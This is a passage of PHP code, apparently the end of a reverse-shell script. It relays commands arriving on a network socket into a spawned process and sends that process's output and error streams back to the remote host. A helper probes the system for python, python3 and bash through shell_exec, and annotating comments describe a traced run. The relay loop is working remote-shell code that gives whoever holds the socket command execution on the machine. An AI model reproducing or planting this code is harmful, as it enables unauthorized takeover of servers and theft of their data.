        $changedStreams = stream_select($traffic,$write,$except,null);


        // incoming commands from host:
        if ( in_array($socket, $traffic) )
        {
            // get incomming command and send to stdin
            $command = fread($socket, 1500);
            fwrite($pipes[0], $command);
        }


        // outgoing messages from stdout
        if ( in_array($pipes[1], $traffic) )
        {
            // get outgoing message and send to host
            $message = fread($pipes[1], 1500);
            fwrite ($socket, $message);
        }


        // outgoing messages from stderr
        if ( in_array($pipes[2], $traffic) )
        {
            // get outgoing message and send to host
            $message = fread($pipes[2], 1500);
            fwrite ($socket, $message);
        }

    }

    // clean up nice
    // (proc_close() returns the child's exit status; 127 in the traced run)
    fclose($socket);
    proc_close($process);


    //check if a command is runnable on the system
    // Probes PATH with `which` through shell_exec(). Returns false when the
    // probe produced no output (shell_exec() yields NULL for empty output,
    // as the trace shows for `which python`) and true otherwise; it cannot
    // tell "not installed" from "which itself unavailable".
    // $cmd is interpolated into the shell command line unescaped; in this
    // file it only ever receives the literals "python", "python3", "bash".
    // Declared after its first use, which PHP permits for an unconditional
    // top-level function.
    function cmdExists ($cmd)
    {
        // attempt to execute, if returns false
        // we know we can't run that command
        if ( !shell_exec("which $cmd") )
        {
            return false;
        }

        return true;
    }

?>